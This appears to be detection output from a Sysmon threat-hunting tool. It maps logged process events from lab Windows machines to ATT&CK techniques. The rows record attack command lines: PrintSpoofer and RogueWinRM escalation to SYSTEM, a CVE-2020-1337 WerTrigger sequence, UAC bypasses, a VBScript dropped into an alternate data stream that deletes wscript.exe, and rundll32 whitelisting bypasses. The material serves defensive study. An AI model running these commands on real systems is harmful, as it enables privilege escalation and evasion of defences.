2020-08-12 13:06:04.074 + 747F3D96-E93C-5F33-0000-0010A6F00E00 + 8032 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E909-5F33-0000-0020E7030000 + 
0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E93B-5F33-0000-001003BA0E00 + 7920 + C:\Windows\System32\wermgr.exe + C:\Windows\system32\wermgr.exe -upload + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /name Microsoft.BackupAndRestoreCenter ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11267 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 03:25:24.677 + 365ABB72-9DA4-5CD3-0000-00107F7A2F00 + 2920 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /name Microsoft.BackupAndRestoreCenter + C:\Users\IEUser\AppData\Local\Temp\onedrive\ + IEWIN7\IEUser + 365ABB72-94CD-5CD3-0000-0020DD3A0100 + 0x13add + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-9DA4-5CD3-0000-00102E692F00 + 3184 + C:\Windows\System32\sdclt.exe + "C:\Windows\system32\sdclt.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557370343.531513,2019-05-09T06:52:23.531513+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /C "C:\Windows\wscript.exe "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11242 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 
2019-05-09 02:52:23.515 + 365ABB72-95E7-5CD3-0000-001004970F00 + 3784 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /C "C:\Windows\wscript.exe "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" + C:\Users\IEUser\AppData\Local\Temp\onedrive\ + IEWIN7\IEUser + 365ABB72-94CD-5CD3-0000-0020DD3A0100 + 0x13add + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-9570-5CD3-0000-00103FC90A00 + 1900 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436045.252684,2019-07-30T01:34:05.252684+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32 AllTheThings.dll,EntryPoint )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4965 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.213 + 747F3D96-664D-5D3F-0000-0010F1498C00 + 6836 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1088] 
Bypass User Account Control - Process,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5277 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 10:14:08.401 + 747F3D96-5E70-5D45-0000-0010FCDD9D00 + 3656 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-5E6F-5D45-0000-001014CA9D00 + 8180 + C:\Windows\System32\fodhelper.exe + "C:\Windows\system32\fodhelper.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1561018068.92556,2019-06-20T12:07:48.925560+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-20 08:07:48.909 + 365ABB72-3ED4-5D0B-0000-0010B2871A00 + 1440 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "cmd" + c:\ProgramData\ + IEWIN7\IEUser + 365ABB72-3991-5D0B-0000-002029350100 + 0x13529 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 
365ABB72-3D05-5D0B-0000-001004220D00 + 816 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5277 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 10:14:08.401 + 747F3D96-5E70-5D45-0000-0010FCDD9D00 + 3656 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-5E6F-5D45-0000-001014CA9D00 + 8180 + C:\Windows\System32\fodhelper.exe + "C:\Windows\system32\fodhelper.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556610375.246489,2019-04-30T11:46:15.246489+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c echo msdhch > \\.\pipe\msdhch ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8575 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 07:46:15.183 + 365ABB72-FD47-5CC7-0000-00106AF61D00 + 4088 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c echo msdhch > \\.\pipe\msdhch + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 
365ABB72-F6A1-5CC7-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-F6A1-5CC7-0000-001004550000 + 468 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include (powershell, -c , -i ,powershell) in event with Command Line (powershell.exe) and Parent Image :C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe , Parent CommandLine (PrintSpoofer.exe -i -c powershell.exe) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 110434 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-02 18:01:54.866 + 747F3D96-B592-5EAD-0000-0010D4CDC200 + 1428 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + powershell.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-6ABB-5EAD-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-B592-5EAD-0000-0010ECCBC200 + 6760 + C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe + PrintSpoofer.exe -i -c powershell.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through 
command line ( powershell.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 110434 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-02 18:01:54.866 + 747F3D96-B592-5EAD-0000-0010D4CDC200 + 1428 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + powershell.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-6ABB-5EAD-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-B592-5EAD-0000-0010ECCBC200 + 6760 + C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe + PrintSpoofer.exe -i -c powershell.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 348 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:45.193 + 747F3D96-292D-5E1E-0000-0010F5597D00 + 3828 + C:\Windows\explorer.exe + 10.0.17763.348 (WinBuild.160101.0800) + Windows Explorer + Microsoft® Windows® Operating System + Microsoft Corporation + EXPLORER.EXE + explorer ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-292D-5E1E-0000-0020CD587D00 + 0x7d58cd + 0 + High + SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959 + 747F3D96-2910-5E1E-0000-0010F5F07C00 + 4612 + C:\Windows\System32\wbem\WmiPrvSE.exe + 
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 348 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:45.193 + 747F3D96-292D-5E1E-0000-0010F5597D00 + 3828 + C:\Windows\explorer.exe + 10.0.17763.348 (WinBuild.160101.0800) + Windows Explorer + Microsoft® Windows® Operating System + Microsoft Corporation + EXPLORER.EXE + explorer ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-292D-5E1E-0000-0020CD587D00 + 0x7d58cd + 0 + High + SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959 + 747F3D96-2910-5E1E-0000-0010F5F07C00 + 4612 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2164892 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-10-05 20:43:58.450 + 00247C92-858E-5F7B-0000-0010E741202B + 6636 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe + C:\windows\ + LAPTOP-JU4M3I0E\bouss + 00247C92-8C36-5F75-0000-002034E39103 + 0x391e334 + 2 + High + 
SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-858E-5F7B-0000-00105241202B + 18404 + C:\Windows\System32\Taskmgr.exe + C:\windows\system32\taskmgr.exe + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237564.075706,2020-08-12T17:06:04.075706+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" > nul 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342414 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:03.484 + 747F3D96-E93B-5F33-0000-0010C1B40E00 + 7888 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe /c schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" > nul 2>&1 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ + MSEDGEWIN10\IEUser + 747F3D96-E911-5F33-0000-0020241C0400 + 0x41c24 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E938-5F33-0000-00109CA00E00 + 7820 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe + WerTrigger.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1584766854.689567,2020-03-21T09:00:54.689567+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243570 + + + + + 
Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:45.082 + 747F3D96-9F7D-5E75-0000-00104E062100 + 2484 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-9F77-5E75-0000-001090F32000 + 2416 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1590282830.330775,2020-05-24T05:13:50.330775+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 196371 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-24 01:13:50.301 + 747F3D96-CA4E-5EC9-0000-00109FE23700 + 1516 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-BDD1-5EC9-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-CA4B-5EC9-0000-0010B8CB3700 + 3960 + C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe + RogueWinRM.exe -p c:\Windows\System32\cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line 
Interface,1561018068.909935,2019-06-20T12:07:48.909935+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8114 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-20 08:07:48.894 + 365ABB72-3ED4-5D0B-0000-00106C871A00 + 888 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "cmd" + c:\ProgramData\ + IEWIN7\IEUser + 365ABB72-3991-5D0B-0000-002029350100 + 0x13529 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-3D05-5D0B-0000-001004220D00 + 816 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237564.051227,2020-08-12T17:06:04.051227+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342413 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:02.548 + 747F3D96-E93A-5F33-0000-001014B30E00 + 7868 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ + MSEDGEWIN10\IEUser + 747F3D96-E911-5F33-0000-0020241C0400 + 0x41c24 + 1 + Medium + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E938-5F33-0000-00109CA00E00 + 7820 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe + WerTrigger.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557370343.500263,2019-05-09T06:52:23.500263+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /C "echo Dim objShell:Dim oFso:Set oFso = CreateObject("Scripting.FileSystemObject"):Set objShell = WScript.CreateObject("WScript.Shell"):command = "powershell.exe":objShell.Run command, 0:command = "C:\Windows\System32\cmd.exe /c ""start /b """" cmd /c ""timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest""""":objShell.Run command, 0:Set objShell = Nothing > "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11238 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 02:52:23.484 + 365ABB72-95E7-5CD3-0000-001046950F00 + 2812 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /C "echo Dim objShell:Dim oFso:Set oFso = CreateObject("Scripting.FileSystemObject"):Set objShell = WScript.CreateObject("WScript.Shell"):command = "powershell.exe":objShell.Run command, 0:command = "C:\Windows\System32\cmd.exe /c ""start /b """" cmd /c ""timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest""""":objShell.Run command, 0:Set objShell = Nothing > "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" + C:\Users\IEUser\AppData\Local\Temp\onedrive\ + IEWIN7\IEUser + 365ABB72-94CD-5CD3-0000-0020DD3A0100 + 0x13add + 1 + 
Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-9570-5CD3-0000-00103FC90A00 + 1900 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 423994 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:36.012 + 747F3D96-51D0-5F93-0000-001036A15B00 + 3396 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 + C:\Users\IEUser\AppData\Local\Temp\tmp1375\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002085A50800 + 0x8a585 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51CD-5F93-0000-001073735B00 + 7624 + C:\Users\Public\test.tmp + c:\Users\Public\test.tmp + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 423994 + + + + + 
Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:36.012 + 747F3D96-51D0-5F93-0000-001036A15B00 + 3396 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 + C:\Users\IEUser\AppData\Local\Temp\tmp1375\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002085A50800 + 0x8a585 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51CD-5F93-0000-001073735B00 + 7624 + C:\Users\Public\test.tmp + c:\Users\Public\test.tmp + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 ),1," + + + + + 1 + 